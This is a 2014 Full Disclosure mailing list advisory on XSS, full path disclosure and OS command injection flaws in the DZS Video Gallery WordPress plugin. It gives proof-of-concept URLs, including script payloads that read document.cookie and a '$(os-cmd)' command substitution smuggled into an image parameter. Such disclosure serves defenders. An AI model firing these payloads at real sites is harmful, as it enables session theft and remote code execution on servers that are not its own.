Full Disclosure mailing list archives
XSS, FPD and RCE vulnerabilities in DZS Video Gallery for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 13 Jul 2014 23:57:24 +0300
Hello list!These are Cross-Site Scripting, Full path disclosure and OS Commanding vulnerabilities in plugin DZS Video Gallery for WordPress.
Earlier I've disclosed Content Spoofing and Cross-Site Scripting vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).
------------------------- Affected products: ------------------------- Vulnerable are all versions of DZS Video Gallery for WordPress. ------------------------- Affected vendors: ------------------------- Digital Zoom Studio http://digitalzoomstudio.net ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure (WASC-13): http://site/wp-content/plugins/dzs-videogallery/videogallery.php http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.phpFPD in php-files of the plugin (by default) or in error_log - in all folders of the plugin. The files vary depending on version of the plugin.
OS Commanding (WASC-31): http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)RCE using method of Pichaya Morimoto (http://seclists.org/fulldisclosure/2014/Jun/117).
------------ Timeline:------------
2014.05.08 - announced at my site. 2014.05.09 - informed developer, but he ignored. 2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- XSS, FPD and RCE vulnerabilities in DZS Video Gallery for WordPress MustLive (Jul 13)